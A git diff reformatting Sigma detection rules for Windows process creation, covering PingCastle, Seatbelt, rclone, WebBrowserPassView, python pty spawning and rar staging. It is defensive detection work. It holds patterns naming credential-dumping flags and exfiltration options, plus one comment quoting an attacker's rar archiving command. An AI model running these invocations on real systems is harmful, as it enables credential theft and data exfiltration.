SHA256=e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27 + - SHA256=75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41 + - SHA256=56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1 + - SHA256=f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0 + - SHA256=845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8 + - SHA256=9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d + - SHA256=5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726 + - SHA256=37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90 + - SHA256=ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5 + - SHA256=3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140 + - SHA256=d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87 + - SHA256=63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892 + - SHA256=47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054 + - SHA256=7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd + - Image|endswith: \PingCastle.exe + - OriginalFileName: PingCastle.exe + - Product: Ping Castle + - CommandLine|contains: + - --scanner aclcheck + - --scanner antivirus + - --scanner computerversion + - --scanner foreignusers + - --scanner laps_bitlocker + - --scanner localadmin + - --scanner nullsession + - --scanner nullsession-trust + - --scanner oxidbindings + - --scanner remote + - --scanner share + - --scanner smb + - --scanner smb3querynetwork + - --scanner spooler + - --scanner startup + - --scanner zerologon + - CommandLine|contains: --no-enum-limit + - CommandLine|contains|all: + - --healthcheck + - --level Full + - CommandLine|contains|all: + - --healthcheck + - '--server ' condition: process_creation and selection falsepositives: - Unknown +# Note: As this is a PUA the level may vary depending on your environment. Reduce or increase the level as you see fit level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml index 30b376ac7..170c39f27 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml @@ -1,14 +1,11 @@ title: PUA - PingCastle Execution From Potentially Suspicious Parent id: b37998de-a70b-4f33-b219-ec36bf433dc0 related: - - id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c - type: derived + - id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c + type: derived status: experimental -description: 'Detects the execution of PingCastle, a tool designed to quickly assess - the Active Directory security level via a script located in a potentially suspicious - or uncommon location. - - ' +description: | + Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. references: - https://github.com/vletoux/pingcastle - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ @@ -54,45 +51,44 @@ detection: - \AppData\Roaming\ - \Temporary Internet selection_parent_path_2: - - ParentCommandLine|contains|all: - - :\Users\ - - \Favorites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Favourites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Contacts\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Favorites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Favourites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Contacts\ selection_cli: - - Image|endswith: \PingCastle.exe - - OriginalFileName: PingCastle.exe - - Product: Ping Castle - - CommandLine|contains: - - --scanner aclcheck - - --scanner antivirus - - --scanner computerversion - - --scanner foreignusers - - --scanner laps_bitlocker - - --scanner localadmin - - --scanner nullsession - - --scanner nullsession-trust - - --scanner oxidbindings - - --scanner remote - - --scanner share - - --scanner smb - - --scanner smb3querynetwork - - --scanner spooler - - --scanner startup - - --scanner zerologon - - CommandLine|contains: --no-enum-limit - - CommandLine|contains|all: - - --healthcheck - - --level Full - - CommandLine|contains|all: - - --healthcheck - - '--server ' - condition: process_creation and (1 of selection_parent_* and selection_parent_ext - and selection_cli) + - Image|endswith: \PingCastle.exe + - OriginalFileName: PingCastle.exe + - Product: Ping Castle + - CommandLine|contains: + - --scanner aclcheck + - --scanner antivirus + - --scanner computerversion + - --scanner foreignusers + - --scanner laps_bitlocker + - --scanner localadmin + - --scanner nullsession + - --scanner nullsession-trust + - --scanner oxidbindings + - --scanner remote + - --scanner share + - --scanner smb + - --scanner smb3querynetwork + - --scanner spooler + - --scanner startup + - --scanner zerologon + - CommandLine|contains: --no-enum-limit + - CommandLine|contains|all: + - --healthcheck + - --level Full + - CommandLine|contains|all: + - --healthcheck + - '--server ' + condition: process_creation and (1 of selection_parent_* and selection_parent_ext and selection_cli) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_process_hacker.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_process_hacker.yml index 6ae277a11..ba18de941 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_process_hacker.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_process_hacker.yml @@ -1,18 +1,13 @@ title: PUA - Process Hacker Execution id: 811e0002-b13b-4a15-9d00-a613fce66e42 related: - - id: 5722dff1-4bdd-4949-86ab-fbaf707e767a - type: similar + - id: 5722dff1-4bdd-4949-86ab-fbaf707e767a + type: similar status: experimental -description: 'Detects the execution of Process Hacker based on binary metadata information - (Image, Hash, Imphash, etc). - - Process Hacker is a tool to view and manipulate processes, kernel options and - other low level options. - +description: | + Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). + Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes. - - ' references: - https://processhacker.sourceforge.io/ - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/ @@ -36,13 +31,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image: - - Image|contains: \ProcessHacker_ - - Image|endswith: \ProcessHacker.exe - - OriginalFileName: - - ProcessHacker.exe - - Process Hacker - - Description: Process Hacker - - Product: Process Hacker + - Image|contains: \ProcessHacker_ + - Image|endswith: \ProcessHacker.exe + - OriginalFileName: + - ProcessHacker.exe + - Process Hacker + - Description: Process Hacker + - Product: Process Hacker selection_hashes: Hashes|contains: - MD5=68F9B52895F4D34E74112F3129B3B00D @@ -54,21 +49,20 @@ detection: - IMPHASH=3695333C60DEDECDCAFF1590409AA462 - IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF selection_hash_values: - - md5: - - 68f9b52895f4d34e74112f3129b3b00d - - b365af317ae730a67c936f21432b9c71 - - sha1: - - c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e - - a0bdfac3ce1880b32ff9b696458327ce352e3b1d - - sha256: - - d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f - - bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4 - - Imphash: - - 04de0ad9c37eb7bd52043d2ecac958df - - 3695333c60dedecdcaff1590409aa462 + - md5: + - 68f9b52895f4d34e74112f3129b3b00d + - b365af317ae730a67c936f21432b9c71 + - sha1: + - c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e + - a0bdfac3ce1880b32ff9b696458327ce352e3b1d + - sha256: + - d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f + - bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4 + - Imphash: + - 04de0ad9c37eb7bd52043d2ecac958df + - 3695333c60dedecdcaff1590409aa462 condition: process_creation and (1 of selection_*) falsepositives: - - While sometimes 'Process Hacker is used by legitimate administrators, the execution - of Process Hacker must be investigated and allowed on a case by case basis + - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_radmin.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_radmin.yml index 64687c416..90ce16682 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_radmin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_radmin.yml @@ -1,8 +1,7 @@ title: PUA - Radmin Viewer Utility Execution id: 5817e76f-4804-41e6-8f1d-5fa0b3ecae2d status: test -description: Detects the execution of Radmin which can be abused by an adversary to - remotely control Windows machines +description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md - https://www.radmin.fr/ @@ -22,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: Radmin Viewer - - Product: Radmin Viewer - - OriginalFileName: Radmin.exe + - Description: Radmin Viewer + - Product: Radmin Viewer + - OriginalFileName: Radmin.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_rcedit_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_rcedit_execution.yml index 812a06a70..2287cbaab 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_rcedit_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_rcedit_execution.yml @@ -1,9 +1,7 @@ title: PUA - Potential PE Metadata Tamper Using Rcedit id: 0c92f2e6-f08f-4b73-9216-ecb0ca634689 status: test -description: Detects the use of rcedit to potentially alter executable PE metadata - properties, which could conceal efforts to rename system utilities for defense - evasion. +description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. references: - https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe - https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915 @@ -26,15 +24,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \rcedit-x64.exe - - \rcedit-x86.exe - - Description: Edit resources of exe - - Product: rcedit + - Image|endswith: + - \rcedit-x64.exe + - \rcedit-x86.exe + - Description: Edit resources of exe + - Product: rcedit selection_flags: - CommandLine|contains: --set- + CommandLine|contains: --set- # Covers multiple edit commands such as "--set-resource-string" or "--set-version-string" selection_attributes: - CommandLine|contains: + CommandLine|contains: - OriginalFileName - CompanyName - FileDescription @@ -43,7 +41,6 @@ detection: - LegalCopyright condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of the tool by administrators or users to update metadata of - a binary + - Legitimate use of the tool by administrators or users to update metadata of a binary level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_rclone_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_rclone_execution.yml index 223a39507..67fa11037 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_rclone_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_rclone_execution.yml @@ -1,13 +1,12 @@ title: PUA - Rclone Execution id: e37db05d-d1f9-49c8-b464-cee1a4b11638 related: - - id: a0d63692-a531-4912-ad39-4393325b2a9c - type: obsoletes - - id: cb7286ba-f207-44ab-b9e6-760d82b84253 - type: obsoletes + - id: a0d63692-a531-4912-ad39-4393325b2a9c + type: obsoletes + - id: cb7286ba-f207-44ab-b9e6-760d82b84253 + type: obsoletes status: test -description: Detects execution of RClone utility for exfiltration as used by various - ransomwares strains like REvil, Conti, FiveHands, etc +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc references: - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware @@ -29,15 +28,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_specific_options: - CommandLine|contains|all: + CommandLine|contains|all: - '--config ' - '--no-check-certificate ' - ' copy ' selection_rclone_img: - - Image|endswith: \rclone.exe - - Description: Rsync for cloud storage + - Image|endswith: \rclone.exe + - Description: Rsync for cloud storage selection_rclone_cli: - CommandLine|contains: + CommandLine|contains: - pass - user - copy diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_runxcmd.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_runxcmd.yml index 61b36621b..7686dc6e2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_runxcmd.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_runxcmd.yml @@ -1,8 +1,7 @@ title: PUA - RunXCmd Execution id: 93199800-b52a-4dec-b762-75212c196542 status: test -description: Detects the use of the RunXCmd tool to execute commands with System or - TrustedInstaller accounts +description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts references: - https://www.d7xtech.com/free-software/runx/ - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ @@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_account: - CommandLine|contains: + CommandLine|contains: - ' /account=system ' - ' /account=ti ' selection_exec: - CommandLine|contains: /exec= + CommandLine|contains: /exec= condition: process_creation and (all of selection_*) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_seatbelt.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_seatbelt.yml index 9e8d536e1..568c3ef68 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_seatbelt.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_seatbelt.yml @@ -1,8 +1,7 @@ title: PUA - Seatbelt Execution id: 38646daa-e78f-4ace-9de0-55547b2d30da status: test -description: Detects the execution of the PUA/Recon tool Seatbelt via PE information - of command line parameters +description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters references: - https://github.com/GhostPack/Seatbelt - https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html @@ -23,24 +22,29 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \Seatbelt.exe - - OriginalFileName: Seatbelt.exe - - Description: Seatbelt - - CommandLine|contains: - - ' DpapiMasterKeys' - - ' InterestingProcesses' - - ' InterestingFiles' - - ' CertificateThumbprints' - - ' ChromiumBookmarks' - - ' ChromiumHistory' - - ' ChromiumPresence' - - ' CloudCredentials' - - ' CredEnum' - - ' CredGuard' - - ' FirefoxHistory' - - ' ProcessCreationEvents' + - Image|endswith: \Seatbelt.exe + - OriginalFileName: Seatbelt.exe + - Description: Seatbelt + - CommandLine|contains: + # This just a list of the commands that will produce the least amount of FP in "theory" + # Comment out/in as needed in your environment + # To get the full list of commands see reference section + - ' DpapiMasterKeys' + - ' InterestingProcesses' + - ' InterestingFiles' + - ' CertificateThumbprints' + - ' ChromiumBookmarks' + - ' ChromiumHistory' + - ' ChromiumPresence' + - ' CloudCredentials' + - ' CredEnum' + - ' CredGuard' + - ' FirefoxHistory' + - ' ProcessCreationEvents' + # - ' RDPSessions' + # - ' PowerShellHistory' selection_group_list: - CommandLine|contains: + CommandLine|contains: - ' -group=misc' - ' -group=remote' - ' -group=chromium' @@ -49,7 +53,7 @@ detection: - ' -group=user' - ' -group=all' selection_group_output: - CommandLine|contains: ' -outputfile=' + CommandLine|contains: ' -outputfile=' condition: process_creation and (selection_img or all of selection_group_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_system_informer.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_system_informer.yml index d0ddb6491..21e2ba498 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_system_informer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_system_informer.yml @@ -1,11 +1,10 @@ title: PUA - System Informer Execution id: 5722dff1-4bdd-4949-86ab-fbaf707e767a related: - - id: 811e0002-b13b-4a15-9d00-a613fce66e42 - type: similar + - id: 811e0002-b13b-4a15-9d00-a613fce66e42 + type: similar status: experimental -description: Detects the execution of System Informer, a task manager tool to view - and manipulate processes, kernel options and other low level operations +description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations references: - https://github.com/winsiderss/systeminformer author: Florian Roth (Nextron Systems) @@ -27,24 +26,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_image: - - Image|endswith: \SystemInformer.exe - - OriginalFileName: SystemInformer.exe - - Description: System Informer - - Product: System Informer + - Image|endswith: \SystemInformer.exe + - OriginalFileName: SystemInformer.exe + - Description: System Informer + - Product: System Informer selection_hashes: Hashes|contains: + # Note: add other hashes as needed + # 3.0.11077.6550 - MD5=19426363A37C03C3ED6FEDF57B6696EC - SHA1=8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC - SHA256=8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287 - IMPHASH=B68908ADAEB5D662F87F2528AF318F12 selection_hash_values: - - md5: 19426363A37C03C3ED6FEDF57B6696EC - - sha1: 8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC - - sha256: 8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287 - - Imphash: B68908ADAEB5D662F87F2528AF318F12 + - md5: 19426363A37C03C3ED6FEDF57B6696EC + - sha1: 8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC + - sha256: 8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287 + - Imphash: B68908ADAEB5D662F87F2528AF318F12 condition: process_creation and (1 of selection_*) falsepositives: - - System Informer is regularly used legitimately by system administrators or developers. - Apply additional filters accordingly + - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_webbrowserpassview.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_webbrowserpassview.yml index 48fa22efe..7186c0043 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_webbrowserpassview.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_webbrowserpassview.yml @@ -1,10 +1,7 @@ title: PUA - WebBrowserPassView Execution id: d0dae994-26c6-4d2d-83b5-b3c8b79ae513 status: test -description: Detects the execution of WebBrowserPassView.exe. A password recovery - tool that reveals the passwords stored by the following Web browsers, Internet - Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, - Safari, and Opera +description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md author: frack113 @@ -22,8 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: Web Browser Password Viewer - - Image|endswith: \WebBrowserPassView.exe + - Description: Web Browser Password Viewer + - Image|endswith: \WebBrowserPassView.exe condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml index 1f2eb18f9..c6899496d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml @@ -1,9 +1,7 @@ title: PUA - Wsudo Suspicious Execution id: bdeeabc9-ff2a-4a51-be59-bb253aac7891 status: test -description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let - the user execute programs with different permissions (System, Trusted Installer, - Administrator...etc) +description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) references: - https://github.com/M2Team/Privexec/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,12 +20,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_metadata: - - Image|endswith: \wsudo.exe - - OriginalFileName: wsudo.exe - - Description: Windows sudo utility - - ParentImage|endswith: \wsudo-bridge.exe + - Image|endswith: \wsudo.exe + - OriginalFileName: wsudo.exe + - Description: Windows sudo utility + - ParentImage|endswith: \wsudo-bridge.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -u System - -uSystem - -u TrustedInstaller diff --git a/sigma/sysmon/process_creation/proc_creation_win_python_adidnsdump.yml b/sigma/sysmon/process_creation/proc_creation_win_python_adidnsdump.yml index c1ab640e5..cb197b13e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_python_adidnsdump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_python_adidnsdump.yml @@ -1,12 +1,9 @@ title: PUA - Adidnsdump Execution id: 26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160 status: test -description: 'This tool enables enumeration and exporting of all DNS records in the - zone for recon purposes of internal networks Python 3 and python.exe must be installed, - +description: | + This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump author: frack113 @@ -25,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \python.exe - CommandLine|contains: adidnsdump + CommandLine|contains: adidnsdump condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_python_inline_command_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_python_inline_command_execution.yml index 3e7a86a09..8b8bbe620 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_python_inline_command_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_python_inline_command_execution.yml @@ -1,8 +1,7 @@ title: Python Inline Command Execution id: 899133d5-4d7c-4a7f-94ee-27355c879d90 status: test -description: Detects execution of python using the "-c" flag. This is could be used - as a way to launch a reverse shell or execute live python code. +description: Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. references: - https://docs.python.org/3/using/cmdline.html#cmdoption-c - https://www.revshells.com/ @@ -22,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: python.exe - - Image|endswith: - - python.exe - - python3.exe - - python2.exe + - OriginalFileName: python.exe + - Image|endswith: + - python.exe # no \ bc of e.g. ipython.exe + - python3.exe + - python2.exe selection_cli: - CommandLine|contains: ' -c' - filter_python: + CommandLine|contains: ' -c' + filter_python: # Based on baseline ParentImage|startswith: C:\Program Files\Python ParentImage|endswith: \python.exe ParentCommandLine|contains: -E -s -m ensurepip -U --default-pip @@ -37,7 +36,6 @@ detection: ParentImage|endswith: \AppData\Local\Programs\Microsoft VS Code\Code.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Python libraries that use a flag starting with "-c". Filter according to your - environment + - Python libraries that use a flag starting with "-c". Filter according to your environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_python_pty_spawn.yml b/sigma/sysmon/process_creation/proc_creation_win_python_pty_spawn.yml index 55447d70c..ed58f3d1d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_python_pty_spawn.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_python_pty_spawn.yml @@ -1,8 +1,8 @@ title: Python Spawning Pretty TTY on Windows id: 480e7e51-e797-47e3-8d72-ebfce65b6d8d related: - - id: 899133d5-4d7c-4a7f-94ee-27355c879d90 - type: derived + - id: 899133d5-4d7c-4a7f-94ee-27355c879d90 + type: derived status: test description: Detects python spawning a pretty tty references: @@ -22,15 +22,15 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_img: Image|endswith: - - python.exe + - python.exe # no \ bc of e.g. ipython.exe - python3.exe - python2.exe selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - import pty - .spawn( selection_cli_2: - CommandLine|contains: from pty import spawn + CommandLine|contains: from pty import spawn condition: process_creation and (selection_img and 1 of selection_cli_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_query_session_exfil.yml b/sigma/sysmon/process_creation/proc_creation_win_query_session_exfil.yml index 3591fb4ba..de3591ac7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_query_session_exfil.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_query_session_exfil.yml @@ -1,8 +1,7 @@ title: Query Usage To Exfil Data id: 53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2 status: test -description: Detects usage of "query.exe" a system binary to exfil information such - as "sessions" and "processes" for later use +description: Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 author: Nasreddine Bencherchali (Nextron Systems) @@ -20,7 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: :\Windows\System32\query.exe - CommandLine|contains: + CommandLine|contains: - session > - process > condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_rar_compress_data.yml b/sigma/sysmon/process_creation/proc_creation_win_rar_compress_data.yml index d5789680d..1e2d12ba6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rar_compress_data.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rar_compress_data.yml @@ -1,10 +1,7 @@ title: Files Added To An Archive Using Rar.EXE id: 6f3e2987-db24-4c78-a860-b4f4095a7095 status: test -description: Detects usage of "rar" to add files to an archive for potential compression. - An adversary may compress data (e.g. sensitive documents) that is collected prior - to exfiltration in order to make it portable and minimize the amount of data sent - over the network. +description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md - https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html @@ -24,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \rar.exe - CommandLine|contains: ' a ' + CommandLine|contains: ' a ' condition: process_creation and selection falsepositives: - Highly likely if rar is a default archiver in the monitored environment. diff --git a/sigma/sysmon/process_creation/proc_creation_win_rar_compression_with_password.yml b/sigma/sysmon/process_creation/proc_creation_win_rar_compression_with_password.yml index 7c0abe19b..706055a92 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rar_compression_with_password.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rar_compression_with_password.yml @@ -1,9 +1,7 @@ title: Rar Usage with Password and Compression Level id: faa48cae-6b25-4f00-a094-08947fef582f status: test -description: Detects the use of rar.exe, on the command line, to create an archive - with password protection or with a specific compression level. This is pretty - indicative of malicious actions. +description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. references: - https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/ - https://ss64.com/bash/rar.html @@ -23,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_password: - CommandLine|contains: ' -hp' + CommandLine|contains: ' -hp' selection_other: - CommandLine|contains: + CommandLine|contains: - ' -m' - ' a ' condition: process_creation and (selection_password and selection_other) diff --git a/sigma/sysmon/process_creation/proc_creation_win_rar_susp_greedy_compression.yml b/sigma/sysmon/process_creation/proc_creation_win_rar_susp_greedy_compression.yml index f8bcc5b6f..98893725d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rar_susp_greedy_compression.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rar_susp_greedy_compression.yml @@ -1,8 +1,7 @@ title: Suspicious Greedy Compression Using Rar.EXE id: afe52666-401e-4a02-b4ff-5d128990b8cb status: experimental -description: Detects RAR usage that creates an archive from a suspicious folder, either - a system folder or one of the folders often used by attackers for staging purposes +description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes references: - https://decoded.avast.io/martinchlumecky/png-steganography author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems) @@ -16,22 +15,23 @@ logsource: product: windows category: process_creation detection: + # Example : rar.exe a -m5 -r -y -ta20210204000000 -hp1qazxcde32ws -v2560k Asia1Dpt-PC-c.rar c:\\*.doc c:\\*.docx c:\\*.xls c:\\*.xlsx c:\\*.pdf c:\\*.ppt c:\\*.pptx c:\\*.jpg c:\\*.txt >nul process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_opt_1: - - Image|endswith: \rar.exe - - Description: Command line RAR + - Image|endswith: \rar.exe + - Description: Command line RAR selection_opt_2: - CommandLine|contains: + CommandLine|contains: - '.exe a ' - ' a -m' selection_cli_flags: - CommandLine|contains|all: - - ' -hp' - - ' -r ' + CommandLine|contains|all: + - ' -hp' # password + - ' -r ' # recursive selection_cli_folders: - CommandLine|contains: + CommandLine|contains: - ' ?:\\\*.' - ' ?:\\\\\*.' - ' ?:\$Recycle.bin\' diff --git a/sigma/sysmon/process_creation/proc_creation_win_rasdial_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_rasdial_execution.yml index 65fcb214c..245f495a9 100644 --- 